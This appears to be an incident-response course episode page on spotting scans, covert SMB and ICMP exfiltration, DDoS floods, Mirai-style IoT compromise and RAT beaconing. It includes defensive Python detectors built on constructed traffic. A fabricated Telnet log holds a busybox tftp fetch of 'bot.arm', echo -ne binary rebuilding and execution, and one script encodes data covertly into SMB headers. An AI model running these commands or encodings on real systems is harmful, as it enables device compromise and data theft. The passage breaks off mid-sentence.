Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.
All content for CyberCode Academy is the property of CyberCode Academy and is served directly from their servers with no modification, redirects, or rehosting. The podcast is not affiliated with or endorsed by Podjoint in any way.
Course 6 - Network Traffic Analysis for Incident Response | Episode 5: Scanning, Covert Data Exfiltration, DDoS Attacks and IoT Exploitation
CyberCode Academy
11 minutes
6 days ago
In this lesson, you’ll learn about: Network Threat Analysis — understanding how common attacks and advanced malware appear in real traffic captures, and how to extract intelligence from them.
Part 1 — Analysis of Common Network Threats
1. Network Scanning Techniques
Attackers scan networks to discover targets, services, and vulnerabilities. Demonstrations cover several scanning styles:
SYN / Half-Open Scan
Sends SYN packets without completing the handshake.
A SYN/ACK reply means the port is open (the scanner answers it with RST instead of completing the handshake); an RST reply means closed; no reply usually means filtered.
Full Connect Scan
Completes the full TCP three-way handshake.
Noisier, because the server application sees and often logs the completed connection, but it needs no raw-socket privileges and gives unambiguous results.
Xmas Tree Scan
Uses an abnormal TCP flag combination: FIN + PSH + URG, which no legitimate stack sends.
Relies on RFC 793 behaviour: a closed port answers with RST while an open port stays silent. Windows stacks reply RST regardless of port state, so the technique does not work against them.
Zombie / Idle Scan
Uses an unwitting third-party host (“zombie”) to hide attacker identity.
Probes the zombie’s IP ID counter before and after sending a SYN with the zombie’s spoofed source address to the target: if the port is open the target sends the zombie a SYN/ACK, the zombie answers RST and its IP ID advances by two instead of one.
Network Worm Scanning (e.g., WannaCry)
Worms scan many IPs for a single vulnerable port, such as SMB 445.
High-volume, repetitive SYNs from one source to the same port across many addresses are the key signature.
2. Data Exfiltration (Covert Channels)
Focus: understanding how attackers hide stolen data inside legitimate-appearing traffic.
Covert SMB Channel
Data leaked one byte at a time inside SMB packets.
Requires:
Reviewing thousands of similar packets,
Extracting embedded data,
Base64 decoding,
Reversing the result,
Revealing hidden Morse code.
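The decoding chain just listed, as an added example that is not the episode's own material: a constructed stream of SMB2-like packets carries one byte each of base64(reverse(morse(secret))), with decoy packets mixed in, and the script reverses every layer. The header offset that carries the leaked byte and the packet layout are assumptions made for the demonstration; in a real capture you would first pin down which field varies across the otherwise identical packets.

```python
import base64

MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
    "G": "--.", "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..",
    "M": "--", "N": "-.", "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.",
    "S": "...", "T": "-", "U": "..-", "V": "...-", "W": ".--", "X": "-..-",
    "Y": "-.--", "Z": "--..",
}
MORSE_REV = {v: k for k, v in MORSE.items()}

SMB2_MAGIC = b"\xfeSMB"
HEADER_LEN = 64          # SMB2 header size; every carrier packet here is header-only
COVERT_OFFSET = 16       # hypothetical: the leaked byte rides in this header byte


def morse_encode(text):
    return " / ".join(" ".join(MORSE[c] for c in word) for word in text.upper().split())


def morse_decode(code):
    return " ".join("".join(MORSE_REV[sym] for sym in word.split()) for word in code.split(" / "))


def build_capture(secret):
    """Constructed carrier traffic, not a real capture.

    The exfiltrated stream is base64(reverse(morse(secret))); each carrier
    packet holds one byte of it, and a decoy (short, NetBIOS-framed) packet
    is interleaved after every seventh carrier so the extractor has to filter.
    """
    stream = base64.b64encode(morse_encode(secret)[::-1].encode("ascii"))
    pkts = []
    for i, b in enumerate(stream):
        hdr = bytearray(SMB2_MAGIC + b"\x40\x00" + bytes(HEADER_LEN - 6))
        hdr[COVERT_OFFSET] = b
        pkts.append(bytes(hdr))
        if i % 7 == 0:
            pkts.append(b"\x00\x00\x00\x10" + SMB2_MAGIC + bytes(12))
    return pkts


def extract_stream(packets):
    """Keep only header-only SMB2 packets and pull the covert byte from each."""
    out = bytearray()
    for p in packets:
        if len(p) == HEADER_LEN and p.startswith(SMB2_MAGIC):
            out.append(p[COVERT_OFFSET])
    return bytes(out)


def recover_secret(packets):
    """Reverse the exfiltration chain: extract -> base64-decode -> reverse -> Morse."""
    layered = base64.b64decode(extract_stream(packets)).decode("ascii")
    return morse_decode(layered[::-1])


CAPTURE = build_capture("SOS HELP")

if __name__ == "__main__":
    print(len(CAPTURE), "packets,", len(extract_stream(CAPTURE)), "covert bytes")
    print(recover_secret(CAPTURE))
```

Order matters twice here: packets must be reassembled in capture (or sequence-number) order before base64 decoding, and the string reversal has to be undone before Morse decoding, since reversed Morse symbols decode to different letters.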
ICMP Abuse
Attackers carry data in the payload of ICMP echo request/reply packets (the field a normal ping fills with a fixed pattern) and reassemble it into files (e.g., a GIF).
Easy to overlook because ICMP is treated as diagnostic traffic and is rarely inspected or logged; unusual payload sizes, non-standard padding patterns and a high volume of echo packets to one host are the tell-tales.
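As an added example (not code from the episode), the script below builds raw IPv4/ICMP echo packets whose payloads carry chunks of a constructed GIF, parses them back from the bytes, verifies the ICMP checksum, orders the chunks by sequence number and checks the magic bytes of the result. The ICMP identifier, chunk size and the "file" itself are assumptions; the parsing and reassembly logic is what you would run over a pcap's frames.

```python
import struct

GIF_MAGIC = (b"GIF87a", b"GIF89a")
CHUNK = 12


def inet_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words (0 = verified ok)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident, seq, payload, src=b"\x0a\x00\x00\x05", dst=b"\x0a\x00\x00\x14", reply=False):
    """Constructed IPv4 + ICMP echo packet (type 8 request, type 0 reply).
    The IP header checksum is left at zero; the parser does not check it."""
    itype = 0 if reply else 8
    csum = inet_checksum(struct.pack("!BBHHH", itype, 0, 0, ident, seq) + payload)
    icmp = struct.pack("!BBHHH", itype, 0, csum, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0, src, dst)
    return ip + icmp


def parse_echo(raw):
    """Return (ident, seq, payload) for an IPv4 ICMP echo packet, else None."""
    if len(raw) < 20 or raw[0] >> 4 != 4 or raw[9] != 1:     # not IPv4 / not ICMP
        return None
    icmp = raw[(raw[0] & 0x0F) * 4:]
    if len(icmp) < 8:
        return None
    itype, _code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    if itype not in (0, 8) or inet_checksum(icmp) != 0:
        return None
    return ident, seq, icmp[8:]


def reassemble(packets, ident):
    """Join the payloads of one identifier in sequence order; a repeated
    sequence number (retransmission) overwrites the earlier copy."""
    chunks = {}
    for raw in packets:
        parsed = parse_echo(raw)
        if parsed and parsed[0] == ident:
            chunks[parsed[1]] = parsed[2]
    return b"".join(chunks[s] for s in sorted(chunks))


def looks_like_gif(data):
    return data[:6] in GIF_MAGIC


def echo_payload_profile(packets):
    """Per identifier: packet count and the set of payload lengths seen. A real
    ping keeps one fixed length; a tunnel shows volume and a ragged final chunk."""
    prof = {}
    for raw in packets:
        parsed = parse_echo(raw)
        if parsed:
            ident, _seq, payload = parsed
            entry = prof.setdefault(ident, {"packets": 0, "lengths": set()})
            entry["packets"] += 1
            entry["lengths"].add(len(payload))
    return prof


# Constructed "file": a GIF89a signature, a 16x16 logical screen, filler bytes.
FAKE_GIF = b"GIF89a" + struct.pack("<HH", 16, 16) + bytes(range(70))


def build_capture():
    """Constructed capture, not real traffic: the fake GIF tunnelled under ICMP
    identifier 0xBEEF in 12-byte chunks, out of order with one repeat, plus a
    normal ping pair (other identifier) and a UDP packet the parser must skip."""
    pkts = [build_echo(0xBEEF, seq, FAKE_GIF[seq * CHUNK:(seq + 1) * CHUNK])
            for seq in (3, 0, 5, 1, 6, 2, 4, 1)]
    pkts.append(build_echo(0x0042, 1, bytes(range(56))))
    pkts.append(build_echo(0x0042, 1, bytes(range(56)), reply=True))
    pkts.append(struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 1, 0, 64, 17, 0,
                            b"\x0a\x00\x00\x05", b"\x0a\x00\x00\x14") + bytes(8))
    return pkts


CAPTURE = build_capture()

if __name__ == "__main__":
    data = reassemble(CAPTURE, 0xBEEF)
    print(len(data), "bytes reassembled, GIF:", looks_like_gif(data))
    print(echo_payload_profile(CAPTURE))
```

The profile function is the triage step: an identifier with dozens of echo packets and more than one payload length deserves reassembly, while a request/reply pair with the OS default payload is just a ping.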
3. Distributed Denial of Service (DDoS) Attacks
Explains why DDoS attacks remain common: cheap cloud resources, insecure IoT devices, accessible botnets.
Volumetric SYN Flood
Floods a listening port (e.g., HTTP 80) with SYNs, usually from spoofed source addresses, so the server's SYN/ACKs go unanswered and the handshakes never complete.
Exhausts the server's half-open connection (SYN backlog) table, so legitimate clients cannot connect.
HTTP Flood
Sends massive amounts of GET/POST requests.
Harder to distinguish from legitimate traffic because every request arrives over a completed TCP handshake and is well-formed; detection relies on request rate, URL distribution and client behaviour rather than on malformed packets.
Amplification / Reflection Attacks
A small request sent with the victim's spoofed source address makes the reflector deliver a much larger response to the victim.
Memcached (UDP 11211): a request of a few bytes can return kilobytes to megabytes of cached data, giving amplification factors in the tens of thousands.
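As an added example (not code from the episode), the script below runs two flood detectors over constructed flow records as a transit-point capture would see them: a per-target SYN completion ratio for the SYN flood, and a bytes-returned-per-byte-requested factor for reflection traffic. The addresses, volumes and thresholds are assumptions chosen for the demonstration.

```python
from collections import defaultdict, namedtuple

SYN, ACK = 0x02, 0x10
Flow = namedtuple("Flow", "ts src dst proto sport dport flags size")

# UDP services commonly abused as reflectors (port -> name). Memcached is the
# extreme case: one small request can return a very large cached value.
REFLECTOR_PORTS = {11211: "memcached", 53: "dns", 123: "ntp", 1900: "ssdp"}


def build_sample_flows():
    """Constructed records, not real data. Each row is one packet summary."""
    victim, flows = "203.0.113.10", []
    # SYN flood: 300 SYNs in one second from 300 spoofed sources to port 80,
    # each answered with SYN/ACK but never followed by the client's ACK.
    for i in range(300):
        spoofed = f"10.{(i >> 8) & 255}.{i & 255}.7"
        ts = i / 300
        flows.append(Flow(ts, spoofed, victim, "tcp", 50000 + i, 80, SYN, 60))
        flows.append(Flow(ts, victim, spoofed, "tcp", 80, 50000 + i, SYN | ACK, 60))
    # Five legitimate clients complete the handshake in the same second.
    for i in range(5):
        client, ts = f"198.51.100.{20 + i}", 0.1 * i
        flows.append(Flow(ts, client, victim, "tcp", 40000 + i, 80, SYN, 60))
        flows.append(Flow(ts, victim, client, "tcp", 80, 40000 + i, SYN | ACK, 60))
        flows.append(Flow(ts, client, victim, "tcp", 40000 + i, 80, ACK, 52))
    # Memcached reflection: 15-byte requests carrying the victim's address as
    # source reach five reflectors, each of which returns 50 kB per request.
    for r in range(5):
        reflector = f"192.0.2.{10 + r}"
        for k in range(3):
            flows.append(Flow(1.0 + k, victim, reflector, "udp", 9000, 11211, 0, 15))
            flows.append(Flow(1.0 + k, reflector, victim, "udp", 11211, 9000, 0, 50_000))
    # An ordinary DNS lookup for contrast: 40-byte query, 120-byte answer.
    flows.append(Flow(2.0, victim, "192.0.2.53", "udp", 5353, 53, 0, 40))
    flows.append(Flow(2.0, "192.0.2.53", victim, "udp", 53, 5353, 0, 120))
    return flows


def syn_flood_report(flows, window=1.0, min_syns=200, max_completion=0.1):
    """Per (target, port, time window): SYN count, distinct sources and the share
    of SYNs followed by a client ACK. A spoofed flood shows many sources and
    almost no completions. Real captures should take the ACK from stream state."""
    stats = defaultdict(lambda: {"syns": 0, "acks": 0, "sources": set()})
    for f in flows:
        if f.proto != "tcp":
            continue
        key = (f.dst, f.dport, int(f.ts // window))
        if f.flags == SYN:
            stats[key]["syns"] += 1
            stats[key]["sources"].add(f.src)
        elif f.flags == ACK:
            stats[key]["acks"] += 1
    report = {}
    for key, s in stats.items():
        completion = s["acks"] / s["syns"] if s["syns"] else 0.0
        if s["syns"] >= min_syns and completion <= max_completion:
            report[key] = {"syns": s["syns"], "sources": len(s["sources"]),
                           "completion": round(completion, 3)}
    return report


def amplification_report(flows, min_factor=10.0):
    """Response bytes per request byte for each (claimed requester, service port).
    A victim-side capture never sees the spoofed requests, so request bytes are
    0 there and the responses are reported as unsolicited (factor = inf)."""
    req, resp = defaultdict(int), defaultdict(int)
    for f in flows:
        if f.proto != "udp":
            continue
        if f.dport in REFLECTOR_PORTS:
            req[(f.src, f.dport)] += f.size
        elif f.sport in REFLECTOR_PORTS:
            resp[(f.dst, f.sport)] += f.size
    report = {}
    for key, rbytes in resp.items():
        qbytes = req.get(key, 0)
        factor = rbytes / qbytes if qbytes else float("inf")
        if factor >= min_factor:
            report[key] = {"service": REFLECTOR_PORTS[key[1]], "request_bytes": qbytes,
                           "response_bytes": rbytes, "factor": round(factor, 1)}
    return report


FLOWS = build_sample_flows()

if __name__ == "__main__":
    print(syn_flood_report(FLOWS))
    print(amplification_report(FLOWS))
```

Note that the SYN/ACKs the victim sends back are not a discriminator: the server answers spoofed SYNs exactly as it answers real ones, which is why the detector counts the final ACK rather than the server's reply.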
4. IoT Device Exploitation
Demonstration focuses on how attackers compromise weak devices such as DVRs.
Many IoT devices use default credentials and insecure services like Telnet.
Attack flow typically involves:
Logging in via Telnet.
Attempting to download malware (e.g., Mirai ELF binary).
When automated delivery (TFTP) fails, the loader rebuilds the binary on the device chunk by chunk with echo -ne and hex escapes, as Mirai does.
Device joins a botnet and starts scanning other victims.
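As an added example (not code from the episode), the script below carves a dropped binary back out of a Telnet session transcript of the kind described above: it finds every echo -ne line, decodes the hex escapes, replays the > and >> redirections into files, and identifies the result by its ELF header. The transcript, the file name and the ELF bytes are constructed for the demonstration; the chunk size is arbitrary and not a claim about Mirai's loader.

```python
import re
import struct

# busybox echo -ne '\x7f\x45...' > file   ('>' truncates, '>>' appends)
ECHO_RE = re.compile(r"echo\s+-n?e\s+'((?:\\x[0-9a-fA-F]{2})+)'\s*(>>?)\s*(\S+)")
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
ELF_MACHINES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3E: "x86-64"}


def echo_chunks(session_lines):
    """Yield (filename, redirect, bytes) for every echo-based write in a session log."""
    for line in session_lines:
        m = ECHO_RE.search(line)
        if m:
            escaped, redirect, fname = m.groups()
            yield fname, redirect, bytes(int(h, 16) for h in HEX_RE.findall(escaped))


def rebuild_files(session_lines):
    """Replay the writes in order: '>' starts the file over, '>>' appends to it."""
    files = {}
    for fname, redirect, data in echo_chunks(session_lines):
        if redirect == ">":
            files[fname] = bytearray(data)
        else:
            files.setdefault(fname, bytearray()).extend(data)
    return {name: bytes(buf) for name, buf in files.items()}


def is_elf(data):
    return data[:4] == b"\x7fELF"


def elf_machine(data):
    """Architecture from e_machine (offset 18), honouring the EI_DATA endianness byte."""
    if not is_elf(data) or len(data) < 20:
        return None
    endian = "<" if data[5] == 1 else ">"
    (machine,) = struct.unpack(endian + "H", data[18:20])
    return ELF_MACHINES.get(machine, hex(machine))


def fake_session(binary, fname, chunk=16):
    """Constructed Telnet transcript, not a real session: a failed TFTP fetch,
    then the binary pushed with echo -ne in fixed-size chunks, then execution."""
    lines = ["login: root", "Password: ", "BusyBox v1.01 built-in shell (ash)",
             "# /bin/busybox tftp -g -r bot.arm -l " + fname + " 10.0.0.99",
             "tftp: applet not found"]
    for i in range(0, len(binary), chunk):
        hexes = "".join("\\x%02x" % b for b in binary[i:i + chunk])
        lines.append("# /bin/busybox echo -ne '%s' %s %s" % (hexes, ">" if i == 0 else ">>", fname))
    lines.append("# chmod 777 " + fname + "; ./" + fname)
    return lines


# Constructed 32-bit little-endian ARM ELF header followed by filler bytes.
FAKE_ELF = (b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)      # e_ident: class, data, version
            + struct.pack("<HH", 2, 0x28)                     # e_type=EXEC, e_machine=ARM
            + bytes(range(40)))
SESSION = fake_session(FAKE_ELF, "dvrHelper")

if __name__ == "__main__":
    for name, data in rebuild_files(SESSION).items():
        print(name, len(data), "bytes, ELF:", is_elf(data), "arch:", elf_machine(data))
```

Reconstructing the file from the transcript gives you a hashable sample even when the device itself is gone or wiped, and the e_machine value tells you which architecture's sandbox to load it in.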
Part 2 — In-Depth Malware Case Studies
1. Remote Access Trojans (RATs)
Traffic begins with system information reporting from the infected host.
Followed by persistent command-and-control (C2) communication, typically periodic check-ins at a fixed interval with only small jitter.
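As an added example (not code from the episode), the script below flags the periodic C2 check-in pattern described above in a constructed connection log: it groups outbound connections by source, destination and port and scores the regularity of the gaps between them. The addresses, interval and thresholds are assumptions; the records would normally come from flow logs or a pcap's TCP SYNs.

```python
from collections import defaultdict
from statistics import mean, pstdev


def beacon_candidates(connections, min_count=8, max_jitter=0.15):
    """Group connections by (src, dst, dport) and flag pairs whose gaps are nearly
    constant: coefficient of variation (stdev / mean) at or below max_jitter.
    Human-driven traffic is bursty and scores far higher. Records are
    (timestamp_seconds, src, dst, dport)."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in connections:
        by_pair[(src, dst, dport)].append(ts)
    found = {}
    for key, stamps in by_pair.items():
        if len(stamps) < min_count:          # too few connections to judge
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else float("inf")
        if jitter <= max_jitter:
            found[key] = {"connections": len(stamps), "interval_s": round(avg, 1),
                          "jitter": round(jitter, 3)}
    return found


def build_sample_connections():
    """Constructed connection log, not real data: one host beacons every ~60 s
    with a few seconds of jitter, the same host browses another site at
    irregular times, and a second host touches the C2 address only three times."""
    offsets = [0, 2, -3, 1, -2, 3, -1, 0, 2, -3, 1, -2]
    rows = [(60 * i + off, "10.0.0.15", "198.51.100.77", 443) for i, off in enumerate(offsets)]
    rows += [(t, "10.0.0.15", "198.51.100.5", 443)
             for t in (0, 5, 140, 150, 600, 605, 1500, 1510, 3000, 3002)]
    rows += [(t, "10.0.0.16", "198.51.100.77", 443) for t in (30, 31, 33)]
    return rows


CONNECTIONS = build_sample_connections()

if __name__ == "__main__":
    for key, info in beacon_candidates(CONNECTIONS).items():
        print(key, info)
```

Once a pair is flagged, the first connection of the series is where the initial system-information report would sit, so that is the session to reassemble and read in full.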
2. Fileless Malware
Malware runs directly in memory, leaving minimal filesystem artifacts.
Often, network traffic is the only complete copy of the payload available.
3. Network Worms
Automate scanning and propagation.
Look for specific open ports, then exploit and install themselves.
4. Multi-Stage Malware
Downloader retrieves multiple malware families.
Identifying...